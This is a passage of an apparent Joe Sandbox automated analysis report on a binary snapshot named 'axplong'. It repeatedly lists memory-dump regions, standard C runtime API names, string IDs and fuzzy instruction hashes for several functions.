                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: 'kAd+F$P#@$P#@
                                        • API String ID: 2659868963-3446528079
                                        • Opcode ID: 3b4e405c4c73811be42fb548f0c6fc714ca8f8f1bed20a3359052d6a60a681cc
                                        • Instruction ID: edb3e56f53f69ce661e35466e60eb17e101642d00dbfc6d8c8f17c16217c36d5
                                        • Opcode Fuzzy Hash: 3b4e405c4c73811be42fb548f0c6fc714ca8f8f1bed20a3359052d6a60a681cc
                                        • Instruction Fuzzy Hash: 38F0A0B591020C67C714EEE5D80198AB3ACDA15315B108A2BFA44A7541F7B4FA48879A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _strrchr
                                        • String ID:
                                        • API String ID: 3213747228-0
                                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                        • Instruction ID: 80392d38669299bfd156cc743137b1e55d3eb7f87ffdfa8cf3f659ae93825dbe
                                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                        • Instruction Fuzzy Hash: E3B136329002859FEB11DF29C8C17AEBBE5EF59300F14A1ABD855BB341D63C9D42CB68
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                        • String ID:
                                        • API String ID: 531285432-0
                                        • Opcode ID: b47c8ba6fe03d4e095c6b2ded81985e9e06279d2aebcc52fa30b3ac8f806d208
                                        • Instruction ID: 0436f2bf1fd4ae6352d53801718c112a35185accf0b19711cbd4b6e7ceb45150
                                        • Opcode Fuzzy Hash: b47c8ba6fe03d4e095c6b2ded81985e9e06279d2aebcc52fa30b3ac8f806d208
                                        • Instruction Fuzzy Hash: AB216575A40219AFDF10EFA5CC819FEBB79EF08714F00406AF501B7251DB74AD418BA5
                                        APIs
                                        • __Mtx_init_in_situ.LIBCPMT ref: 0041726C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_init_in_situ
                                        • String ID: @.@$`zA
                                        • API String ID: 3366076730-264144187
                                        • Opcode ID: 85c69a542711adcbdc723e53ec2e352efba648933d4f98de690f5e4d1d54eb20
                                        • Instruction ID: f262903753b1b92517ad6e1593d74fc3307ac53456c80996635a8a266d537bb5
                                        • Opcode Fuzzy Hash: 85c69a542711adcbdc723e53ec2e352efba648933d4f98de690f5e4d1d54eb20
                                        • Instruction Fuzzy Hash: 30A137B4E016198FDB21CFA8C98479EBBF1AF48704F14819AE819AB351E7799D41CB84
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: 8"F$`'F
                                        • API String ID: 3903695350-3117062166
                                        • Opcode ID: 7cc84738d4ada6297d6a0fb0f14596f6b5ef1043b6aead768a540562b0a62405
                                        • Instruction ID: 16833f8704bef9767550e365d62d6ec02a0348751fb53c48f95eca9ca5c43528
                                        • Opcode Fuzzy Hash: 7cc84738d4ada6297d6a0fb0f14596f6b5ef1043b6aead768a540562b0a62405
                                        • Instruction Fuzzy Hash: 0E317231A00305DFDB21AB79D905B5773E5AF08314F10646FE886D7252DF7AEC588B19
                                        APIs
                                        • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                                        • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_init_in_situ
                                        • String ID: pB@
                                        • API String ID: 3366076730-522444117
                                        • Opcode ID: 853d83a076cbc7226a509cdb9e842d0995eb72176d5c94cff8f73588fd830228
                                        • Instruction ID: a26189a986e4dd1b89f6ce3af94e59f84d9fcc23830c965df4aad3e38ef2e394
                                        • Opcode Fuzzy Hash: 853d83a076cbc7226a509cdb9e842d0995eb72176d5c94cff8f73588fd830228
                                        • Instruction Fuzzy Hash: C64127B06017059FD720CF19C98475ABBF5FF44315F14862EE86A8B781E7B8A905CF80
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: P#@$P#@
                                        • API String ID: 2659868963-3974838576
                                        • Opcode ID: ddf5e71c06a52d7d55740b92384bd183d62590499cadfedb7835ffcaf7cab153
                                        • Instruction ID: 686c2b215b1296f9daec2399383962352f9f2510f431a6a01e91d29dc1f86165
                                        • Opcode Fuzzy Hash: ddf5e71c06a52d7d55740b92384bd183d62590499cadfedb7835ffcaf7cab153
                                        • Instruction Fuzzy Hash: 12F0A775D1020DABC714DFA8D8419CEBBF4AF59304F10C2AFE84467241EB746A59CB9D